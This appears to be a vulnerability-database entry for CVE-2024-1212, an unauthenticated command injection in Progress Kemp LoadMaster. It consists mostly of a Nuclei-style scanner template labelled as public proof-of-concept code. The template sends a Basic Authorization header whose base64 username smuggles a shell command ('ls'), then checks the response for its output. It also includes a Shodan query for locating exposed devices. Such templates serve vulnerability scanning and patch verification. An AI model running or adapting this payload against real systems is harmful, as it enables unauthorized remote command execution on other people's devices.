漏洞描述
Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
CVE-2024-1212: Progress Kemp LoadMaster - Command Injection
PoC代码[已公开]
id: CVE-2024-1212
info:
name: Progress Kemp LoadMaster - Command Injection
author: DhiyaneshDK
severity: critical
description: |
Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
reference:
- https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster
- https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
- https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212
- https://nvd.nist.gov/vuln/detail/CVE-2024-1212
- https://freeloadbalancer.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-1212
cwe-id: CWE-78
epss-score: 0.94363
epss-percentile: 0.99958
metadata:
verified: true
max-request: 1
shodan-query: html:"LoadMaster"
tags: cve,cve2024,progress,rce,loadmaster,kev,vkev
http:
- method: GET
path:
- "{{BaseURL}}/access/set?param=enableapi&value=1"
headers:
Authorization: "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="
matchers-condition: and
matchers:
- type: word
part: body
words:
- "bin"
- "mnt"
- "WWW-Authenticate: Basic"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100906a3c08391e27b825f8728aad822d1b7b66ab43310b416c6bf4b8da4012f9d702207fb117ef6feec0abc58e7e36ba4996cd945cd76b8d74f06183e5431df8fd6a0a:922c64590222798bb761d5b6d8e72950